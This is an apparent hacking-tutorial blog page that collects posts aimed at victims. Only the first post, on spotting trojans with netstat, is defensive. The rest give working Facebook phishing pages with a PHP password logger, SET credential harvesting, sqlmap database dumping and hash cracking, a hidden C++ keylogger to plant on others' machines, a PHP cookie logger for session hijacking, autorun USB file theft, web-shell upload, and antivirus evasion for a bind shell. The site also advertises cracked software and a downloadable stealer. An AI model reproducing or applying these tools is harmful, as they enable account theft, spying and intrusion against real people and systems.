Welcome To Just IT CluB
The best place where you can get free and cracked software and awesome tutorials include tip and trick that never seen on web before or much rare.
Showing posts with label Hacking Tutorial. Show all posts
Showing posts with label Hacking Tutorial. Show all posts

Wednesday, January 8, 2014

How to secure your computer from Trojans and RATs




Symptoms of a trojan:


Unusual behaviour of the system is a mere indication of a Trojan attack!!!
• Programs starting and running without the initiation of the User.
• Opening or Closing of CD-ROM drawers
• Wallpaper, background, or screen saver settings changing by themselves
• Screen display flipping upside down
• Browser program opening strange or unexpected websites.

All the above actions seem like a ghost controlling your system!!!!
The actions clearly indicate that you are under Trojan attack!

Concept behind Detecting Trojans:

The first and foremost thing you have to do is to check the applications which are making network connections with other computers. One of those applications will be a process started by the Server Trojan.

METHOD 1:


Detecting trojans using" netstat" command


An effective method to detect trojans is by using “netstat” command.


Step1: Go to Start>run and type cmd ( to open command prompt)

Step2: Go to C drive and type netstat
It displays all the Active Connections.


Now Type the command netstat –ano
It displays all the present TCP/IP and UDP ports that are being used.


The trojan could be one of the ESTABLISHED conections. But not all the ESTABLISHED connections are trojans.

Saturday, December 28, 2013

How to Hack Facebook Account Using Phishing webPage / How to Make Phishing webPage

Here, i am going to explain one of the popular social engineering attack(luring user to do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how to create a facebook phishing page.
Step 1:
Go to facebook and right click on website .  Select "View source" and copy the code to notepad.
The source of the page is displayed in the browser. Right click on the page and click on Save As. Save the page as index.html on your computer.


Step2:
Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:


Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.
Step 3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

Open the notepad and type the following code:
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "login.php"
Step 4:
Open the notepad and just save the file as "pswrds.txt" (without any contents).
Now our files are ready.Next step is to upload these files to any free web hosting site available on the internet. Google for free web hosting sites, select any one of them(I selected bytehost7), create an account with username as close to Facebook as possible and delete the index.html file available in the htdocs folder.Then using Online File Management upload your own index.html and phish.php files to the htdocs folder. Your htdocs folder will look like below.
Image
 Let’s check if our phishing page is ready by typing the address of our site. If the page is like belowthen our phishing page is working.Image
The next thing we have to do is to send address of our fake website to the victim. We will do this through sending him an email but in order for the victim not to smell something fishy, we will obfuscate the url of the fake page we are about to send him. The sending email address should be as convincingly close to facebook as possible.
Image
 When the victim clicks on the obfuscated url, it will bring him to our fake site.
Image
 If the victim is not cautious enough as to observing the url and enters  his username and password, our attempt is a success. To show this, I will enter random values in both username field and password field and hit Enter.
Image
Now a txt file with name pass.txt will be created in the htdocs folder containing both the username and the password.
Image
 Click on the file. We can see both the email and the password i have entered. The email is “don’t get hacked” and the password is “like me”.
Image
 Counter Point:
If you don’t want to fall victim to phishing, you can take a few precautions . If you want to open a site type the address directly in the url and don’t open any redirected links. Don’t click on any mails which look malicious like asking for your login credentials.

How To Hack Facebook Password Using Social Engineering Toolkit BackTrack

This Tutorial Is On SET. SET Is A Tool Which Is Used For Several Purposes. But In This Tutorial, I Will Explain How Can A Person Make Use Of This Tool For Stealing Passwords Of Facebook, Gmail Of Yahoo. This Tool Will Do Phishing. But You Dont Need To Waste Time For Making Phishing Scripts For Seperate Websites. This Tool Can Be Used For Much More Other Purposes Like Social Engineering Purposes, Harvesting, Cloning Etc. SET Is An Eploitation Tool. Keep Reading Below To Learn More About Phishing Through Social Engineering Toolkit(SET).


SET(Social Engineering Toolkit) In BackTrack 5R3

If You Are Using BackTrack. Then It Must Have SET In It Already. You Can Find It In Applications.
Applications>BackTrack>Exploitation Tools>Social Engineering Tools>Social Engineering Toolkit>Set

Social Engineering Toolkit

Now You Will Be Able To See SET Like Following.

Social Engineering Toolkit


Now Start Working.

Social Engineering Toolkit
1. After Opening SET, Type 1 For Social-Engineering Attacks And Hit Enter.
2. Now In This Step, Type 2 For Website Attack Vectors And Hit Enter.

Social Engineering Toolkit
3. Now Type 3 For Credential Harvester Attack Method And Press Enter.

Social Engineering Toolkit

4. Now In This Step, Type 2 For Site Cloner And Hit Enter.

Site Cloner

5. Now Type Your IP In This Step And Press Enter.

Note: If You Dont Know Your IP. Then Open Terminal In BackTrack. Type ifconfig And Hit Enter. Copy IP From There And Paste In SET And Press Enter. Like I Copied inet addr. I Copied IP From wlan0. Because I Am Using Wireless Connection.

Social Engineering Toolkit

6. Now Type Any Website For Cloning And Press Enter. I Am Going To Use www.facebook.com

Social Engineering Toolkit

7. Wait And Press Enter When You See Screen Like Following Picture.

Social Engineering Toolkit

Now Its Time For Phishing. Give Your Ip Which You Used For Cloning To Victim. Make Him Convince That This Is Facebook And You Have To Sign In There. When The Victim Types His Username And Password And Press Enter. Bingo! Username And Password Will Be Shown On SET(Social Engineering Toolkit) Immediately. Watch Following Picture.

Facebook Password Hacking

Victim Will Be Redirected To Login Page Again And Again. That's All. Subscribe Us For More Updates.

How To Hack Website By Sqlmap-Backtrack 5R2

Sqlmap Is An Automated Pen Testing Tool. That Automates The Process Of Detecting And Exploiting SQL Injection Flaws And Taking Over Of Databases. It Comes With A Powerful Detection Engine, Many Niche Features For The Ultimate Pen Tester And A Broad Range Of Switchs Lasting From Database Fingerprinting. Over Data Fetching From The Database. This Tool Is Best For Beginners. Who Just Now Entered In Security Field. It Is Easy To Use Tool. This Tool Makes SQL Injection Easy As Compared To Manual SQL Injection.

SQLMap In BackTrack 5R3

1. Open Terminal And Type Following Command To Open SqlMap.

 cd /pentest/database/sqlmap 

Or
Go To Applications>BackTrack>Exploitation Tools>DataBase Exploitation Tools>MySQL Exploitation Tools>sqlmap

How To Hack Website Using SQLMap

SQLMap In Windows

1. Download Sqlmap From Here.
2. Extract It.
In Windows OS, You Can Use Sqlmap In Command Prompt. Same Like BackTrack. 

SQL Injection In SQLMap - Website Hacking

I Am Going To Tell, That How Can An Hacker Make Use Of Sqlmap For Hacking A Vulnerable Website. By Using This Tool Hacker Can Get Username And Password Information Too. We Are Sharing These Method's With You Just For Knowledge. HWA Is Not Responsible For Any Bad Activity Which You Do With The Knowledge Gain From HWA. Continue Reading Below If Agree. You Can Understand This Method Easily.
For Doing Following Steps. You Will Need A SQL Injection Vulnerable Website. You Can Find Vulnerable Website's Using Dorks In Google. Follow Steps Below To Continue:

1. Open Sqlmap.
2. Type Following Command.

 python sqlmap.py -u http://www.vulnerablewebsite.com --dbs 

How To Hack Website Using SQLMap

The Above Command Will Show You Database Information Of Vulnerable Website. See Following Picture.
How To Hack Website Using SQLMap
Note: In Your Case, Databases Maybe Different From Above Picture.
3. Now Choose Any Of The Database From Result. For Example: I Am Choosing dkg. Now Use Following Command.

python sqlmap.py -u http://www.vulnerablewebsite.com -D dkg --tables

How To Hack Website Using SQLMap

It Will Show You Tables, Which dkg Database Has. Like Following Picture. Watch Following Picture.

How To Hack Website Using SQLMap

4. Now You Have Got Tables Of Database. Choose Any Of The Table From The Result For Getting Information From It. Hacker's Need Username And Password To Login The Victim Site. So, In This Case. You Should Choose uvp_Users Table. It May Contain Information About The Users Of Website. It Maybe Username, Password In This Table. So, I Am Going To Dump uvp_Users Table Now. By Dumping The Table You Will Be Able To See Information Saved In Table.
Use Following Command To Dump Information From Table.

python sqlmap.py -u http://www.vulnerablewebsite.com -D dkg -T uvp_Users --dump

How To Hack Website Using SQLMap

Above Command Will Dump The Information From Choosed Table. If The Table Which You Choosed, Contains Password In It In Hash Format. Then Sqlmap Will Ask You For Dictionary Based Hash Cracking Attack. Allow It To Get Password In ABC Characters. See Following Picture.

How To Crack Password

5. Press Y And Press Enter. It Will Ask What Dictionary Do You Want To Use?. Choose Default Dictionary. Type 1 And Press Enter.

Password Cracking
6. Now It Will Ask For Common Password Suffixies (slow!). Type y And Press Enter.

Now Password Cracking Procedure Is Started. It Will Some Minutes To Crack It. After The Cracking Process Finishes. You Will Be Able To See Password In Characters Form Along With Other Information. Which Is Saved In Table. Like In uvp_Users You Can See, Username, Password, UserGroup Etc.
After Finishing The Cracking Process. You Will Be Able To See Result Like Following Picture:
How To Hack Website Using SQLMap
You Can See Username And Password In Above Picture. SQL Injection Is Done Using Sqlmap. Have Any Question? Ask In Comments.

How To Crack Wireless Password with Net Tool's 5

Have wireless signals in your area? but cant use them cuz they have security? This Tut will teach you how to use Net Tools 5 to get into them.Lets start without losing time. :)

DIRECT LINK!!
Open Control Panel
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Then view network status and tasks,
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Then click on manage wireless networks,
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Once you find what kinda security it has, as high lighted below, open Net Tools
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
NetTools Side of TuT,
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Once you have nettools open, then, Start> Network Tools> WEP/WPA Key Generator, it should look like it is below,
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Once Open, select the type of security that the Wireless network your trying to get into has, then select "Hex (0-9,A-F)",
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Now you Need too select a Key Length, the best one too use is, 64/40 bits, once you have done that,Be sure to click on the Calculate Key Space,
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Now simply hit Generate Code, and your code will appear,
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Now simply copy and paste that into the password bar, when prompt to, when your connecting too the Wireless signal,
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Then press ok and you're connected to the internet.

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Thursday, December 26, 2013

How To Use IStealer 6.3 Full Tutorial And Download Free

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm


What you need

  • iStealer 6.3
  • Index.php
  • Free webhost place / own site
  • Patience

Download ( Uploaded by me )
Note: This WILL show up on Anti-Virus
http://jumbofiles.com/it6pe1rykm4y


Content

  • Make new free webhost
  • Make PHP Logger
  • Upload PHP Logger
  • Making the server
  • Spread, spread, SPREAD
1a) Making a free webhost

We will use 000WebHost as our host for
iStealer.
http://www.000webhost.com/


Sign up there...
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm


Tuesday, December 24, 2013

Hacking Internet Cafe To Get Unlimited Time

Unlimited Time In Internet Cafe! By Asad

Alright Boys And Girls, Were Gonna Learn How To Disable The Timer On The Computers On In Internet Cafe's.
How to disable the timer on the computers in Internet Cafe and play with your friends as long as you want.
1. First of all create a new Text Document. Then write CMD in it, and then save it as anything.bat. (Make sure you're file is .bat)

2. Now find your batch (.bat) file and run it. If you've done it correctly, you'll see that CMD (Command Prompt) will open.
3. Now, write in the CMD: cd\windows (This will change the directory to WINDOWS). Then type regedit and regedit editor should open.
4. Now navigate to:
HKEY_CURRENT_USER>AppEvents>Software>Classes>Microsoft>Windows>
Current Version>Internet Settings>Policies>System

5. Then on the right pane where it says Disable Taskmanager, right click on it and scroll down to modify, then change the value of it to 0. Then open Task Manager (CTRL+ALT+DELETE or CTRL+SHIFT+ESCAPE) and disable the Internet Cafe's timer.

If you did this right, you're done. Happy Hacking ;)
Do you have questions, comments, or suggestions? Feel free to post a comment!

How To Send Bulk Email Sender [python]

This is a bulk email sending script in python. It doesnt require any dependency. The email of the sender needs to be of gmail and the list of recepients emails should be in a .txt file . Each email should be on a single line else this script will not work. Plz comment and rep+ if you like it.

Code:

import smtplib
import sys

try:
    print "-----------------++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-----------------"
    print "-----------------++++++++++++++++++++++++++++++++++++++--Asad Rafiq--++++++++++++++++++++++++++++++++++++++++++-----------------"
    print "-----------------++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-----------------"
    
    # get the txt file containing the email addresses of recepients. Each email is written on a separate line
    # for example
    # someone@some.com
    # otherperson@other.com
    # and so on
    
    users = raw_input("\n[email sender]  recepients file name:  ")
    if ".txt" in users:
        pass
    else:
        print "[email sender]  this is not a valid txt file"
        sys.exit()

    # get the list of recepients
    recepients = []
    try:
        with open(users) as i:
            user_list = i.readlines()
        for i in user_list:
            recepients.append(i.strip("\n"))
    except IOError :
        print "[email sender]  invalid recepients file"
        sys.exit()

    # get the required information from the user
    FROM = raw_input("[email sender]  from:  ")
    TO = recepients 
    SUBJECT = raw_input("[email sender]  subject:  ")
    TEXT = raw_input("[email sender]  message:  ")



    # Prepare actual message
    headers = ["From: " + FROM,
               "Subject: " + SUBJECT,
               "To: " + ", ".join(TO),
               "MIME-Version: 1.0",
               "Content-Type: text/html"]
    headers = "\r\n".join(headers)
    body = "" + TEXT + ""
    
    # Credentials 
    username = raw_input("[email sender]  your gmail username:  ")
    password = raw_input("[email sender]  your gmail password:  ")

    # The actual mail send
    print "[email sender]  sending....."
    server = smtplib.SMTP('smtp.gmail.com:587')
    server.starttls()
    server.login(username,password)
    server.sendmail(FROM, TO, headers + "\r\n\r\n" + TEXT)
    server.quit()
    print "[email sender]  email sent to all recepients"
except KeyboardInterrupt :
    print "\n[email sender]  program was closed by the user\n"

How to create a keylogger in C++

Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick when compared to phishing web page.

Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++.
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it. -

Saturday, December 21, 2013

How To Steal Cookies And Hack Any Account

Cookies stores all thenecessary Information aboutone’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc. What is a CookieLogger? A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log
File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Download it : http://crocko.com/1702516956.html
Step 2: Copy the Following Script into a Notepad File and
Save the file as
cookielogger.php: &36;filename = “logfile.txt”;
if (isset(&36;_GET["cookie"]))
{
if (!&36;handle = fopen
(&36;filename, ‘a’))
{ echo “Temporary Server
Error,Sorry for the
inconvenience.”;
exit;
}
else {
if (fwrite(&36;handle, “\r\n” .
&36;_GET["cookie"]) === FALSE)
{
echo “Temporary Server
Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server
Error,Sorry for the inconvenience.”;
fclose(&36;handle);
exit;
}
echo “Temporary Server
Error,Sorry for the inconvenience.”;
exit;
?&t; Step 3: Create a new Notepad File and Save it as logfile.txt Step 4: Upload this file to your server cookielogger.php -&t; http:// www.yoursite.com/
cookielogger.php logfile.txt -&t; http:// www.yoursite.com/logfile.txt (chmod 777)
fun.gif -&t; http:// www.yoursite.com/fun.gif If you don’t have any Website
then you can use the following
Website to get a Free Website
which has php support : http://0fees.net step 5: Go to the victim forum and insert this code in the
signature or a post : download it crocko.com/1702516964.html Step 6: When the victim see the post he view the image u
uploaded but when he click the
image he has a Temporary
Error and you will get his
cookie in log.txt . The Cookie
Would Look as Follows: phpbb2mysql_data=a
%3A2%3A%7Bs%3A11%3A
%22autologinid%22%3Bs
%3A0%3A%22%22%3Bs
%3A6%&8203;3A%22userid
%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9 Step 7: To get the access to the Victim’s Account you need to
replace your cookies with the
Victim’s Cookie. You can use a
Cookie Editor for this. The
string before “=” is the name
of the cookie and the string after “=” is its value. So Change
the values of the cookies in the
cookie Editor. Step 8: Goto the Website whose Account you have just
hacked and You will find that
you are logged in as the Victim
and now you can change the
victim’s account information. Note : Make Sure that from Step 6 to 8 the Victim should
be Online because you are
actually Hijacking the Victim’s
******* So if the Victim clicks
on Logout you will also Logout
automatically but once you have changed the password
then you can again login with
the new password and the
victim would not be able to
login. Disclaimer: I don’t take Responsibility for what you do
with this script, served for
Educational purpose only. … 

How To Bypassing Antivirus Security With Msfencode

What You Need

  • A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.

WARNING

We are using some harmless test files, but don't infect people with any real viruses--that's a crime!

Purpose

Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We'll use metasploit to render malware completely invisible to antivirus.

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine. It is not a virus, and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:
cd msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe ls -l listen.exe
You should see the listen.exe file,

Analyzing the Listener with VirusTotal

In BackTrack, click Applications, Internet, "Firefox Web Browser". In Firefox, go to https://www.virustotal.com/
Click the "Choose File" button. Navigate to /root and double-click the listen.exe
"listen.exe" appears in the "Choose File" box,
In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Steel Any Person Secret File Using USB Flash Drive

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.

To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.
Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.
STEP 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.
The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

How to Upload PHP Shell Using FireFox add-on Tamper Data

Shell uploading is a Hell like thing for beginners so here i m writing this tutorial for beginners to upload shell through Temper Data adon of Mozilla FireFox.


When to Use Temper Data:

Some websites don't allow uploading files other than images so in such a situation shell uploading is a problem because we can't upload any php or asp shell file.So we can upload shell by tempering HTTP headers.
Requirements:
  • Mozilla Firef0x
  • Tampe Data add-on
  1. Open Website's Admin Panel...
  2. Change Your Shell ExtensioN t0 .jpeg or .jpg or .gif
  3. Now open y0ur Tamper Data And Click 0n Start Tampering..
  4. Now goto Upload 0pt10n` and upload y0ur Shell As shell.jpg
  5. Windows Will Pop-UP.
      --- Tamper - Submit - Abort REQUEST
    Click 0n Tamper
    At Yewr Right Side Copy All Text fr0m POST DATA BOX
    Paste All text in notepad..
  6. Now Press CTRL + F, a search Text field will appear in your firefox browser's lower left.
  7. Search For Shell.jpg 
  8. Edit You Shell Extension to .php then copy it paste it on post data box And Click On Submit... 
  9. Congrats your shell has been uploaded succesfully.
  10. Now in image gallery where you have uploaded shell, u will see many images.Right click on your shell image and click on "copy image location". Now paste this url in your browser bar.Your shell will open up for U.
 

Why do we need TamperData:

Tamper Data is used to view / modify HTTP/HTTPS headers and post parameters.So with this adon we will trick web application that we are uploading image file i.e. jpg, gif, png etc. but when file will be transferring through HTTP headers, we will change its extension to shell.php and our shell will be uploaded.This is called HTTP headers tempering.

Friday, December 20, 2013

How To Wi-Fi Packet Capturing and S3ssionHijacking [HD] TUTORIAL [MITM ATTACK]

Wi-Fi Packet Capturing and S3ssion Hijacking [ MITM Attack]

Requirements :-
1. Backtrack 5 - r2/r3
2. USB Adapter (If you use Virtual M
achine)


Step 1 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 2 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 3 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 4 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 5 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 6 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 7 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 8 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 9 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 10 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 11 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 12 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 13 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 14 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Step 15 -
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm